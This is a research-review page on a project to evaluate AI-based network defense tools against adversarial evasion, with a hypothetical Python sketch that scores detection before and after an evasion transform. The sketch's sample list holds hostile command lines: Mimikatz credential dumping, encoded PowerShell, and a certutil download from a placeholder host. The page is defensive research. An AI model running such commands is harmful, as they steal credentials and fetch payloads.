AI Evaluation Methodology for Defensive Cyber Operator Tools

As AI-powered network defensive cyber operations (DCO) tools, or AI-based defenses, become more prevalent and more critical to our security, our adversaries are stepping up their efforts to evade detection by these technologies using adversarial AI techniques such as data obfuscation and data poisoning [Subedar 2019]. To our knowledge, no publicly available method currently exists for thoroughly and methodically evaluating the capabilities of an AI-enabled DCO tool or for quantifying the degree to which those capabilities remain effective under adversarial manipulation. The DoD requires an evaluation methodology to practically test the defensive capabilities of an AI defense that is protecting a network.

The objective of this project is to develop a methodology for evaluating the capabilities of an AI defense using publicly available information about defensive network capabilities. Without such a methodology, DoD organizations must either (1) refuse to use AI defenses since they cannot properly test them, (2) apply traditional cybersecurity testing techniques that do not test for AI-specific properties, such as susceptibility to data poisoning, or (3) perform unprincipled ad hoc testing. None of these three options is satisfactory; they can leave the DoD with unjustified confidence in the quality of its cyber defenses.

Shing-hon Lau

Senior Cybersecurity Engineer

The goal of this project is to create a two-part methodology that will

enable the evaluation of the capabilities of AI-enabled network DCO tools
enumerate the principles by which the efficacy of an AI-based DCO tool might be reduced when subjected to adversarial evasions
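
The source does not say how a reduction in efficacy under adversarial evasion would be measured. As a minimal, hypothetical sketch of one way to express it, the Python below compares a detector's detection rate on known-malicious samples before and after an evasion transform is applied. Every name here (`RobustnessReport`, `evaluate_robustness`, `toy_detector`, `toy_evasion`, `TOY_SAMPLES`) and the "retained efficacy" ratio itself are assumptions made for illustration; they are not part of the project's methodology.

```python
from dataclasses import dataclass
from typing import Callable, Sequence


@dataclass(frozen=True)
class RobustnessReport:
    """Hypothetical summary of detection before and after evasion."""
    baseline_detection_rate: float
    evaded_detection_rate: float

    @property
    def retained_efficacy(self) -> float:
        # Fraction of baseline detection that survives the evasion.
        # Defined as 0.0 when the detector catches nothing at baseline.
        if self.baseline_detection_rate == 0:
            return 0.0
        return self.evaded_detection_rate / self.baseline_detection_rate


def detection_rate(detector: Callable[[str], bool],
                   samples: Sequence[str]) -> float:
    """Share of (all-malicious) samples that the detector flags."""
    if not samples:
        raise ValueError("at least one sample is required")
    return sum(1 for s in samples if detector(s)) / len(samples)


def evaluate_robustness(detector: Callable[[str], bool],
                        malicious_samples: Sequence[str],
                        evasion: Callable[[str], str]) -> RobustnessReport:
    """Measure detection on the original and on the evaded samples."""
    baseline = detection_rate(detector, malicious_samples)
    evaded = detection_rate(detector, [evasion(s) for s in malicious_samples])
    return RobustnessReport(baseline, evaded)


# Toy stand-ins (assumptions): a keyword matcher in place of an AI defense,
# and a simple string rewrite in place of a real obfuscation technique.
TOY_SAMPLES = [
    "powershell -enc AAAA",
    "powershell -enc BBBB",
    "mimikatz sekurlsa::logonpasswords",
    "invoke-mimikatz -dumpcreds",
    "certutil -urlcache -f http://example.invalid/a.bin",
]


def toy_detector(command_line: str) -> bool:
    return "-enc" in command_line or "mimikatz" in command_line


def toy_evasion(command_line: str) -> str:
    return command_line.replace("-enc", "-e")


if __name__ == "__main__":
    report = evaluate_robustness(toy_detector, TOY_SAMPLES, toy_evasion)
    print(report, report.retained_efficacy)
```

With these toy inputs, the detector flags four of the five samples at baseline and two of the five after the rewrite, so half of its baseline detection is retained. A real evaluation would replace the keyword matcher with the AI defense under test and the string rewrite with realistic obfuscation or poisoning techniques.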

The completed extensible evaluation methodology will

produce a new capability for the DoD: testing and evaluating the defensive capabilities of an AI defense under realistic conditions
advance the state of the art in cybersecurity more broadly, as there is not yet a principled methodology for evaluating the defensive capabilities of an AI defense for enterprise networks
allow the DoD to repeatably test AI defenses to examine whether they deliver the desired defensive benefits
lead to a deeper understanding of how to detect and mitigate obfuscation and data poisoning with next-generation DCO tools

The project has so far developed an initial methodology that will permit the DoD to test and evaluate the defensive capabilities of an AI defense under realistic conditions. This methodology is undergoing further refinement and expansion to increase the information that its application reveals.

In Context

This FY2022–23 project

will allow DoD organizations to assess whether the AI defenses of today or tomorrow would enhance the protections of critical networks
aligns with the CMU SEI technical objective to bring capabilities through software that make new missions possible or improve the likelihood of success of existing ones and to be trustworthy in construction and implementations
aligns with the CMU SEI technical objective to ensure the cadence of acquisition, delivery, and fielding is responsive to and anticipatory of the operational tempo of DoD warfighters and that the DoD is able to field these new software-enabled systems and their upgrades faster than our adversaries
aligns with the DoD software strategy to accelerate the delivery and adoption of AI

Mentioned in this Article

[Subedar 2019]
Subedar, Mahesh; Ahuja, Nilesh; Krishnan, Ranganath; Ndiour, Ibrahima J.; & Tickoo, Omesh. Deep Probabilistic Models to Detect Data Poisoning Attacks. In Fourth Workshop on Bayesian Deep Learning (NeurIPS 2019), Vancouver, Canada. 2019. http://bayesiandeeplearning.org/2019/papers/112.pdf

Software Engineering Institute

Research Review 2022